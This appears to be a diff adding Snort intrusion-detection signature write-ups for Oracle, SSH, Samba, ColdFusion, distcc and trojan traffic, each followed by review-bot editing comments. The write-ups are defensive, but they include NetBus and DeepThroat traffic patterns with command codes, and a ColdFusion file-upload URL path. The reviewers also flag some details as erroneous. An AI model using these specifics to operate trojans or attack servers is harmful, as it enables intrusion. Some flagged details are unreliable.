+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+PacketStorm:
+http://packetstormsecurity.org/new-exploits/perliis.txt
+
+--
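Review bot: nothing in this file says what sid 1663 actually matches. The Summary, Detailed Information, Affected Systems and Attack Scenarios are the generic web-attack template, and the only specific hint is the perliis.txt reference under Additional References. State the request pattern the rule looks for in the Summary and narrow Affected Systems accordingly rather than "All systems using a web server." Minor: "the attackers choosing" needs an apostrophe.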
--- /dev/null
+++ b/doc/signatures/2842.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2842
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
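Review bot: the Detailed Information sentence is broken mid-sentence so that a line starts with a period: "vulnerability in the procedure drop_snapshot_repgroup" / ". This procedure is included in"; join the two lines. "Oracle Oracle9i" under Affected Systems repeats the vendor name. Ease of Attack "Simple." omits that, per the Attack Scenarios wording "If an attacker can supply enough data to the procedure", the attacker must be able to call the procedure at all, i.e. needs a database session; say so in the rating. Several header and separator lines ("Rule: ", "Sid: ", "-- ") carry trailing whitespace.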
--- /dev/null
+++ b/doc/signatures/1327.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1327
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with root privileges. Denial 
+of Service (DoS) on certain network devices.
+
+--
+Detailed Information:
+A flaw in the CRC32 compensation attack detection code may result in 
+arbitrary code execution with the privileges of the user running the SSH
+daemon (usually root).
+
+Some Netscreen devices may suffer a Denial of Service.
+
+Affected Systems:
+	OpenSSH versions prior to 2.2
+	Multiple Cisco network devices
+	Multiple Netscreen network devices
+	SSH Secure Communications prior to 1.2.31
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted large SSH packets to 
+cause the overflow and present the opportunity to write values to memory
+locations.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+Analysis by David Dittrich:
+http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+
+--
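Review bot: the `--` separator before "Affected Systems:" is missing (the section starts right after "Some Netscreen devices may suffer a Denial of Service."), which breaks the section layout every other file follows. "System compromize" should read "compromise", and "Exploit scripts are available" lacks a period. The version boundaries under Affected Systems ("OpenSSH versions prior to 2.2", "SSH Secure Communications prior to 1.2.31") should be checked against the cited CERT note VU#945216 before this ships, because an off-by-one here would tell an administrator that a vulnerable build is safe.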
--- /dev/null
+++ b/doc/signatures/2685.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2685
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_column
+. This procedure is included in
+sys.dbms_repcat_rq.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
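Review bot: this file carries the same defects as the 2842 entry it was cloned from: the Detailed Information sentence is split so that a line begins with ". This procedure is included in", "Oracle Oracle9i" duplicates the vendor name, and the header lines carry trailing whitespace; fix both files together. The Ease of Attack rating should also note that calling add_column in sys.dbms_repcat_rq presupposes a database session, which the "If an attacker can supply enough data to the procedure" scenario takes for granted.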
--- /dev/null
+++ b/doc/signatures/1236.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1236
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
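Review bot: this file is the generic web-attack template word for word, and unlike the 1663 entry it carries no reference at all, so a reader cannot tell what sid 1236 detects. At minimum the Summary should name the request or URI pattern the rule matches and Additional References should cite it; "All systems using a web server" under Affected Systems is then almost certainly too broad. Minor: "the attackers choosing" needs an apostrophe.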
--- /dev/null
+++ b/doc/signatures/3032.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3032
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
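Review bot: Additional References is empty although Affected Systems pins the issue to "Samba 3.0.8 and prior"; cite the Samba security announcement or CVE for the integer overflow in ACL handling that Detailed Information describes, so administrators can confirm which release fixes it. Typos: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing a space. "None Known" in the False Positives and False Negatives sections lacks the period used in the other files.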
--- /dev/null
+++ b/doc/signatures/100000804.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000804
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "account.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "account.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
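Review bot: this file repeats the defects of the BlueShoes entry (100000430). The Attack Scenarios paragraph describes credential abuse against "an authentication mechanism" instead of the remote file include through the "insPath" parameter of "account.php" that the rule covers; rewrite it around that parameter. The file also opens with two blank lines before "Rule:", the `--` after the Sid and after Affected Systems lack the blank line used elsewhere, "ona web server" is missing a space, "attackers choosing" wants an apostrophe, and "attempt has been attempted" is redundant.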
--- /dev/null
+++ b/doc/signatures/2431.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2431
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
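Review bot: the Affected Systems entry "ISC INN 2.4 .0" has a stray space in the version number and should read "ISC INN 2.4.0"; as written it is ambiguous whether only 2.4.0 or the whole 2.4 line is affected, which matters for the "Upgrade to the latest non-affected version" advice. The Summary should read "in the ISC INN Usenet/NNTP server". Minor: "the attackers choosing" needs an apostrophe, "Apply the appropriate vendor supplied patches" lacks a period, and Additional References is empty with two trailing blank lines.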
--- /dev/null
+++ b/doc/signatures/151.txt
@@ -0,0 +1,86 @@
+Rule:  
+
+--
+Sid:
+151
+
+--
+Summary:
+This rule has been placed in deleted.rules
+
+--
+Impact:
+A remote attacker with DeepThroat access has almost full control of the
+trojaned machine, including file manipulation and download, keystroke
+logging, password scavenging, and reboot. Additionally, the trojan includes 
+a port redirector, and IRC bot, and a tool to scan for other DeepThroat
+infected machines. There are also prank-type annoyances.
+
+--
+Detailed Information:
+DeepThroat is a full-featured remote access trojan.It contains many kiddie
+tools, including window enumeration and manipulation; file searching
+launching and deletion; remote graphics display sound playing and wallpaper
+alteration; remote website launching and file download; shell alteration 
+(e.g. hiding systray or Start button), CD-ROM open/closing, mouse button 
+swapping; screen resolution change, display on/off; password scavenging and
+screen capturing. It also includes a remotely activated FTP server, a keystroke
+logger, an IRC bot, a port redirector, and a tool to scan for other DeepThroat 
+servers. Using these tools, an attacker can not only take control of the 
+infected machine, but can use it as a relay to attack others or scan
+for more infected machines from within your network.  By default, DeepThroat sends its 
+control commands to port 2140 on the trojaned machine.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Users must be actively enticed into installing the trojan, using any of the
+normal social-engineering means. Alternatively, an attacker with physical
+access to the machine could simply install it himself.
+
+--
+Ease of Attack:
+Very simple. This is a point-and-click tool. The toughest part is convincing 
+a user to install it, and it could certainly be bound to another binary for 
+easier social-engineering.
+
+--
+False Positives:
+None Known
+
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Mitigation:
+Block UDP port 2140 (standard DeepThroat control port), if possible TCP port 21
+(standard DeepThroat FTP server), and TCP port 999 (DeepThroat keyboard logger). 
+DeepThroat may be set up to run on other ports than those listed above. Removal 
+is the only sure mitigation.
+
+Removal:
+Scan with an anti-virus tool and follow the removal instructions.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+pbsarnac@ThoughtWorks.com	Initial Research
+Josh Gray			Edits
+-- 
+Additional References:
+Packet dump:
+0000  00 50 56 ff ae cb 00 50  56 fe 18 10 08 00 45 00
+0010  00 1e 30 02 00 00 80 11  b4 71 c0 a8 ea 84 c0 a8
+0020  ea 85 ea 60 08 5c 00 0a  85 8e 31 33 02 b0 c0 a8
+0030  ea 84 00 8a 00 bb 00 00  20 46 48 45            
+
+
+--
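Review bot: the Summary only says "This rule has been placed in deleted.rules" and no longer tells the reader what traffic sid 151 matched; keep a one-line description (DeepThroat control traffic) next to the deprecation notice. Detailed Information names "port 2140" without a protocol while Mitigation says "UDP port 2140"; the packet dump agrees with UDP (IP protocol byte 0x11, destination port bytes 08 5c = 2140), so add "UDP" to Detailed Information as well. Also: "Affected Systems:" is empty, "trojan.It" is missing a space, "and IRC bot" should be "an IRC bot", "unkown" is misspelled, and the Contributors lines use tabs to align roles, which no other file does.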
--- /dev/null
+++ b/doc/signatures/1076.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1076
+
+--
+Summary:
+This event is generated when an attempt is made to access the repost.asp file.
+
+--
+Impact:
+File upload.  This attack may permit an attacker to upload files to the /users directory on the vulnerable server. 
+
+--
+Detailed Information:
+Microsoft Site Server is software for Windows NT servers that allows users to publish, find, and share information.  A vulnerability exists when accessing the repost.asp file, allowing an attacker to upload files to the /users directory of the vulnerable server if access permissions have not been restricted.
+
+--
+Affected Systems:
+Microsoft Site Server 2.0.
+
+--
+Attack Scenarios:
+An attacker can access the respost.asp file, permitting the unauthorized upload of files to the /users directory.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Restrict access permissions on the /users directory.
+
+--
+Contributors:
+Original rute writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10372
+
+
+--
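Review bot: Attack Scenarios refers to "the respost.asp file" while the Summary and Detailed Information concern "repost.asp"; the misspelling will mislead anyone searching web logs for the file name. "Original rute writer unknown" in Contributors should be "rule". Corrective Action could state the restriction concretely (remove write access to /users for unauthenticated web users), which is what Detailed Information's "if access permissions have not been restricted" implies.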
--- /dev/null
+++ b/doc/signatures/115.txt
@@ -0,0 +1,161 @@
+Rule:
+
+--
+Sid:
+115
+
+--
+Summary:
+This event is generated when the victim confirms the connection request 
+sent by the attacker using the NetBus Pro 2.0 trojan.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine. This Trojan
+also has the ability to scan machines and networks for open ports, it
+can also redirect legitimate traffic to other destinations. It can turn
+the infected host into an open proxy server.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Netbus sever to
+programs normally started on boot. Due to the nature of this Trojan it
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	109	netbus active (outgoing TCP connection)
+	110	netbus getinfo (incoming TCP connection)
+	115	netbus active (outgoing TCP connection)
+
+Server ports usually opened may be one of the following depending on the
+version of netbus: 12345, 12346, 20034
+
+NetBus Pro 2.0 incorporates its own protocol. It uses port 20034 by
+defualt, but it can be changed by the attacker. Packet data includes a
+ten byte header followed by the packet's encrypted data. The first two
+bytes of the header are static: 42 4E.  The next two bytes indicate the
+size of the packet, followed by two bytes for the version number,
+followed by two random bytes, and the final ninth and tenth byte make up
+the command code. To look for an attack from one of these functions, the
+header of the suspicious packet will look like: 42 4E S1 S2 V1 V2 R1 R2 C1 C2
+
+NOTE: S1 and S2 are size byte one and size byte two. V1 and V2 are
+version number byte one and version number byte two. R1 and R2 are
+random bytes one and two. C1 and C2 are the command code bytes.
+
+The following is a list of the command codes for many of Net Bus Pro 2.0's functions:
+
+	Capture Desktop Image: 41 01
+	CDROM Open and Close: 60 01
+	Client Chat: 08 00
+	Execute File: 30 01
+	Reading Directory Listing: 50 00
+	Directory Traversal: 51 00
+	Go To URL: 33 01
+	Keyboard Tricks: 61 01
+	Keylogger: 40 01
+	Mouse Tricks: 65 01
+	Open Document: 33 01
+	Play Sound: 31 01
+	Plugin Manager: 90 00
+	Print Document: 34 01
+	Record Sound: 43 01
+	Redirect Application: 10 01
+	Redirect Port: 00 01
+	Registry Manager: 70 00
+	Remote Control: 73 01 and 72 01
+	Send Message: 40 00
+	Send Text: 64 01
+	Show Image: 32 01
+	Sound System: 80 00
+	System Administrator: 21 00
+	System Information: 30 00
+	Windows Manager: 60 00
+	Any Windows Exit Function(Shutdown, Reboot, etc.): 50 01
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+The manual removal of this Trojan should only be attempted by an
+experienced Windows system administrator.
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+
+Registry keys added include:
+
+	Netbus Server Pro
+	PATCH "C:\windows\patch.exe /nomsg" - note: the entry may not necessarily be called PATCH
+	NetBuster = ""
+	SysCopy = "command /c copy %windir%\\keyhook.dl_ %windir%\\*.dll /Y"
+	Rundll32 = "rundll.dl_ /noadd"
+	Rundll = "regedit /s nbsetup2.reg"
+
+Later versions may also add one of these registry entries:
+
+	HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/
+	HKEY_CURRENT_USER/NetBus Server/
+
+These entries should be deleted.
+
+The files rundll.dl_ (note the underscore, this is important) and
+nbsetup2.reg should be deleted if they exist.
+
+Ending the process is necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky Macatee <rmacatee@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS401
+http://www.whitehats.com/info/IDS403
+
+Hackfix.org
+http://www.hackfix.org/netbusfix/index.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/netbus/index.html
+
+--
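Review bot: the SID/Message table gives sid 115 the same text as sid 109, "netbus active (outgoing TCP connection)", yet the Summary says 115 fires when the victim confirms a NetBus Pro 2.0 connection request; give 115 its own message so the table matches the Summary. In the command-code list "Go To URL: 33 01" and "Open Document: 33 01" share a code; one of them is wrong and should be verified. The registry paths under "Later versions may also add" use forward slashes ("HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/") while the earlier ones use backslashes; Windows registry paths take backslashes. Typos: "defualt", "Netbus sever". The "Corrective Action:" header is followed by a blank line, unlike the other sections.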
--- /dev/null
+++ b/doc/signatures/610.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 610
+
+--
+Summary: 
+This event is generated when an attempt to login as the superuser is attempted using rsh.
+
+--
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rsh" with the username "root". Such activity is indicative of attempts to abuse insecure machines with a known default configuration. 
+
+Some UNIX systems use the "rsh" daemon which permits remote "root" logins. This may allow an attacker to connect to the machine and establish an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with the "rsh" service running and connects to it, then proceeds to guess the "root" password
+
+--
+Ease of Attack:
+Simple, no exploit software required
+
+--
+False Positives: 
+A system administrator may be logging in to a host using the username "root"
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("root"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rsh.
+
+Deny remote root logins to the host, use a normal user and "sudo" or give the user the ability to "su" to root where appropriate.
+
+--
+Contributors:
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS391
+
+--
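Review bot: the file has no "Affected Systems:" section, which every other entry carries; add it (UNIX systems running an rsh daemon that permits remote root logins, per Detailed Information). "Sid: 610" is written on one line where the other files put the number on its own line. The Summary "an attempt to login as the superuser is attempted" is redundant; "an attempt is made to log in as the superuser using rsh" reads better. The False Negatives text is a useful detail and should also say that the rule keys on the literal username "root", as Detailed Information states, since that is what makes the gap possible.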
--- /dev/null
+++ b/doc/signatures/3061.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3061
+
+--
+Summary:
+This event is generated when an attempt is made to connect to the distcc
+daemon.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+Distcc is an open source distributed C/C++ compiler that can be used
+to compile code on remote hosts that run the distcc daemon.  A vulnerability
+exists in the handling of commands that are generated via a distcc client.  The
+server does not ensure that compile commands only are sent to it.  A command
+sequence can be created that executes commands on a vulnerable server.  No
+authentication is required to execute a command on a distcc server.
+
+--
+Affected Systems:
+	2.18.3 and prior
+
+--
+Attack Scenarios:
+An attacker can generated a valid distcc command sequence that executes
+a command other than a compile on a vulnerable distcc server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This is a policy rule and requires proper customization for the
+variable $EXTERNAL_NET for sites that allow distcc traffic from
+remote hosts.  The $EXTERNAL_NET variable should be replaced with
+the IP address(es) of unauthorized client hosts only.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use the --allow <hosts> option when starting the distcc daemon
+to specify authorized client hosts.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
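Review bot: "Affected Systems:" reads only "2.18.3 and prior" without the product name; write "distcc 2.18.3 and prior" so the line stands on its own. "An attacker can generated" should be "can generate". The False Positives note on tuning $EXTERNAL_NET is good and belongs in Corrective Action too, next to "--allow <hosts>", because the rule is only useful once the authorized client set is defined both in the daemon and in the rule variable.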
--- /dev/null
+++ b/doc/signatures/907.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+907
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. The 'Web Publish Example Script'
+can be exploited to allow the attacker to upload an arbitrary file to 
+the server.
+
+--
+Impact:
+Serious. The vulnerability allows custom code to be uploaded to the 
+server.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several
+default Example applications installed that have vulnerabilities.  The
+'Web Publish Example script' application can be exploited to allow the
+uploading of arbitrary files.
+
+See Macromedia Security Bulletin (MPSB01-08) for complete information.
+
+--
+Affected Systems:
+	ColdFusion versions 2.x, 3.x, 4.x for Windows
+	ColdFusion versions 4.x for Solaris, HP-UX
+	ColdFusion versions 4.5.x for Linux
+	Expression Evaluator Patch (ASB99-01)
+
+--
+Attack Scenarios:
+The web application allows file uploading via a URL like this:
+
+http://www.target.com/CFDOCS/exampleapps/publish/admin/addcontent.cfm
+
+Once the file has been uploaded, it can be executed by crafting a 2nd
+URL to the uploaded file.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant
+vulnerabilities that are exploitable if the example code is left on a
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+Macromedia Security Bulletin (MPSB01-08)
+http://www.macromedia.com/devnet/security/security_zone/mpsb01-08.html
+
+CAN-2001-0535
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0535
+
+--
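Review bot: the example URL in Attack Scenarios, "http://www.target.com/CFDOCS/exampleapps/publish/admin/addcontent.cfm", uses target.com, which is a real domain; use the reserved example.com from RFC 2606 instead. Under Affected Systems, "Expression Evaluator Patch (ASB99-01)" is not a system and does not belong in that list; if the point is that the earlier patch does not fix this issue, say so in prose. The Summary says "Coldfusion 4.x" while Affected Systems also lists 2.x and 3.x for Windows; align them. Minor: "This rule will generate" has a mid-sentence capital.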
--- /dev/null
+++ b/doc/signatures/2314.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2314
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
